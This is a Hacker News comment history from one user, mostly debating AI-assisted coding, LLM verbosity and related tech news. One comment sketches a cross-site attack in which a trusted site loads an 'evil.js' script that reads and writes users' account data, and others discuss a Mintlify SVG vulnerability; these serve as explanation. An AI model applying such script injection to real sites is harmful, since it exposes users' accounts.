Hacker Newsnew | past | comments | ask | show | jobs | submit | gowld's commentslogin

I don't understand this thinking.

How many hours per week did you spend coding on your most recent project? If you could do something else during that time, and the code still got written, what would you do?

Or are you saying that you believe you can't get that code written without spending an equivalent amount of time describing your judgments?


"Writing code" is not the goal. The goal is to design a coherent logical system that achieves some goal. So the practice of programming is in thinking hard about what goal I want to achieve, then thinking about the sort of logical system that I could design that would allow me to verifiably achieve that goal, then actually banging out the code that implements the abstract logical system that I have in my head, then iterating to refine both the abstract system and its implementation. And as a result of being the one who produced the code, I have certainty that the code implements the system I have in mind, and that the system it represents is for for the purpose of achieving the original goals.

So reducing the part where I go from abstract system to concrete implementation only saves me time spent typing, while at the same time decoupling me from understanding whether the code actually implements the system I have in mind. To recover that coupling, I need to read the code and understand what it does, which is often slower than just typing it myself.

And to even express the system to the code generator in the first place still requires me to mentally bridge the gap between the goal and the system that will achieve that goal, so it doesn't save me any time there.

The exceptions are things where I literally don't care whether the outputs are actually correct, or they're things that I can rely on external tools to verify (e.g. generating conformance tests), or they're tiny boilerplate autocomplete snippets that aren't trying to do anything subtle or interesting.


The actual act of typing code into a text editor and building it could be the least interesting and least valuable part of software development. A developer who sees their job as "writing code" or a company leader who sees engineers' jobs as "writing code" is totally missing where the value is created.

Yes, there is artistry, craftsmanship, and "beautiful code" which shouldn't be overlooked. But I believe that beautiful code comes from solid ideas, and that ugly code comes from flawed ideas. So, as long as the (human-constructed) idea is good, the code (whether it is human-typed or AI-generated) should end up beautiful.


Raising the question: Where is the beautiful machine-generated code?

Where's the beautiful human generated code? There's the IOCCC but that's the only code comleo that's a competition based on the code itself, and it's not even a beauty pageant. There's some demo scene stuff, which is more of a golf thing. There's random one-offs, like not-Carmack's inverse square, or Duff's device, but other than that, where're the good code beauty pageants?

Excellent point. Why are folks downvoting this?

Maybe they’re AIdiots?

In my experience (and especially at my current job) bottlenecks are more often organizational than technical. I spend a lot of time waiting for others to make decisions before I can actually proceed with any work.

My judgement is built in to the time it takes me to code. I think I would be spending the same amount of time doing that while reviewing the AI code to make sure it isn't doing something silly (even if it does technically work.)

A friend of mine recently switched jobs from Amazon to a small AI startup where he uses AI heavily to write code. He says it's improved his productivity 5x, but I don't really think that's the AI. I think it's (mostly) the lack of bureaucracy in his small 2 or 3 person company.

I'm very dubious about claims that AI can improve productivity so much because that just hasn't been my experience. Maybe I'm just bad at using it.


Does voice transcription count as AI? I'm an okay typer, but being able to talk to my computer, in English, is definitely part of the productivity speed up for me. Even though it struggles to do css because css is the devil, being able to yell at my computer and have it actually do things is cathartic in ways I never thought possible.

Depends. What year is it? Voice recognition definitely uses to be considered AI, but today it's well researched and non-exciting.

No, not ai. Just an alternative input method.

All you did was changing the programming language from (say) Python to English. One is designed to be a programming language, with few ambiguities etc. The other is, well, English.

Speed of typing code is not all that different than the speed of typing English, even accounting for the volume expansion of English -> <favorite programming language>. And then, of course, there is the new extra cost of then reading and understanding whatever code the AI wrote.


The thing about this metaphor that people don't seem to ever complete is.

Okay, you've switched to English. The speed of typing the actual tokens is just about the same but...

The standard library is FUCKING HUGE!

Every concept that you have ever read about? Every professional term, every weird thing that gestures at a whole chunk of complexity/functionality ... Now, if I say something to my LLM like:

> Consider the dimensional twins problem -- how're we gonna differentiate torque from energy here?

I'm able to ... "from physics import Torque, Energy, dimensional_analysis" And that part of the stdlib was written in 1922 by Bridgman!


> The standard library is FUCKING HUGE!

And extremely buggy, and impossible to debug, and does not accept or fix bug reports.

AI is like an extremely enthusiastic junior engineer that never learns or improves in any way based on your feedback.

I love working with junior engineers. One of the best parts about working with junior engineers is that they learn and become progressively more experienced as time goes on. AI doesn't.


People need to decide if their counter to AI making programmers obsolete is "current generation AI is buggy, and this will not improve until I retire" or "I only spend coding 5% of my time so it doesn't matter if AI can instantly replace my coding".

And come on: AI definitely will become better as time goes on.


It gets better when the AI provider trains a new model. It doesn't learn from the feedback of the person interacting with it, unlike a human.

Exactly. LLMs are faster for me when I don't care too much about the exact form the functionality takes. If I want precise results, I end up using more natural language to direct the LLM than it takes if I just write that part of the code myself.

I guess we find out which software products just need to be 'good enough' and which need to match the vision precisely.


> Or are you saying that you believe you can't get that code written without spending an equivalent amount of time describing your judgments?

It’s sort of the opposite: You don’t get to the proper judgement without playing through the possibilities in your mind, part of which is accomplished by spending time coding.


I think OP is closer to the latter. How I typically have been using Copilot is as a faster autocomplete that I read and tweak before moving on. Too many years of struggling to describe a task to Siri left me deciding “I’ll just show it what I want” rather than tell.

Inaccurate.

> Apple gave me access to this Mac Studio cluster to test RDMA over Thunderbolt,

Better:

"Engfluencer suggests you spend $15k to run a model slightly faster (jeffgeerling.com)"


These are fun but they lose too much of the original content.

"Texas accidentally does something good for privacy"

is not really an improvement over the original (already half-editorialized) "Texas is suing all of the big TV makers for spying on what you watch"


You log in to goodsite.com

goodsite.com loads a script from user-generated-content-size.com/evil.js

evil.js reads and writes all your goodsite.com account data.


The linked site https://heartbreak.ing/ explains that Mintlify disabled CORS, so that 3rd party sites can run code in your Mintlify-using environment (X, Vercel, etc).

The OP site says that .svg files can only run scripts if they are directly opened, not via <img> tags.

So how does the attack work?


My understanding, the SVGs were imported directly and embedded as code, not as a `src` for an img tag. This is very common, it's a subjectively better (albeit with good security practices) way to render SVGs as it provides the ability to adjust and style them via CSS as they are now just another element in the HTML DOM. It should only be done with "trusted" SVGs however!

As for CORS, they were uploading the SVGs to an account of their own, but then using the vulnerabilities to pivot to other accounts.


Thanks, that makes sense. Strange that the writeup skipped the most important step in the vulnerability!

Which orgs?

On Mac emdash is option-shift-hypen (aka shift-endash, aka capital endash)

In Menlo font (Chrome on Mac's default monospace font, used for HN comments) em-dash(—) and en-dash (–) use the same glyph, though.


Are you saying that needless sentences don't count as needless words?

As GPT would say, "You've hit upon a crucial point underlying the entire situtation!"


I think that's a great sentence to include... you know, provided it's actually true.

I mean, it's usually wrong in its rhetoric, and the writing isn't "good", but it's technically well constructed and it's well constructed in a way that "Hemingway" doesn't reject.

Like, if I ask GPT5 to convert 75f to celsius, it will say "OK, here's the tight answer. No fluff. Just the actual result you need to know." and then in a new graf say "It's 23.8c." (or whatever).


It already bugs me when ChatGPT describes how it is going to answer before answering, but it's 10x more annoying when I'm asking for a concise response without filler etc.

As an aside, I've noticed the self-description happens even more often when extended thinking mode is being used. My unverified intuition is that it references my custom instructions and memory more than once during the thinking process, as it then seems more primed than usual to mimic vocabulary from any saved text like that.


Right, it is currently incapable of providing a straight answer without clearing it's throat selling the answer. It reminds me of those recipe blogs that just can't get to the fucking recipe. It's bad writing! But it's not bad technically, in a style-guide kind of way.

Sometimes I wonder if the throat-clearing is an indispensable part of getting to the "good bits" that follow. Like, do those extra tokens give it more "room to think" even if they're basically meaningless in themselves?

The output tokens are the only information that is carried forward through each inference pass, so "more room to think" is incompatible with "basically meaningless". Perhaps one could imagine it somehow stenographically encoding information in its precise choice of meaningless throat clearing, but there are only so many variations on that theme - word choice is heavily constrained, so it doesn't feel like you could store a whole lot of information there without it starting to read froopiliciously.

Isn’t that the point of the hidden chain of thought tokens, rather than the visible cruft?

I think the fluff, the emojis, the sycophancy is all symptomatic of the training process and human feedback.


I thought PP was saying that the "Thinking" text is only used for one turn, and the response text is the compressed thinking that survives into future turns.

The submission is an ad.

University press releases should not be posted on HN. a press release is just a published paper + PR spin. If the PR spin were true, it would be in the paper. Just link to the paper.

https://www.nature.com/articles/s41467-025-64235-y

Title: "Pushing the boundary of quantum advantage in hard combinatorial optimization with probabilistic computers"

Abstract: "Adaptive parallel tempering [...] scales more favorably and outperforms simulated quantum annealing"

HN title should be changed to match the paper title or abstract.


Terr_ was agreeing with you and highlighting how old the debate is.

Highlighting, yes, agreeing, no.

For my original earlier reply, the main subtext would be: "Your complaint is ridiculously biased."

For the later reply about chess, perhaps: "You're asserting that tricking, amazing, or beating a human is a reliable sign of human-like intelligence. We already know that is untrue from decades of past experience."


You're asserting that tricking, amazing, or beating a human is a reliable sign of human-like intelligence.

I don't know who's asserting that (other than Alan Turing, I guess); certainly not me. Humans are, if anything, easier to fool than our current crude AI models are. Heck, ELIZA was enough to fool non-specialist humans.

In any case, nobody was "tricked" at the IMO. What happened there required legitimate reasoning abilities. The burden of proof falls decisively on those who assert otherwise.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: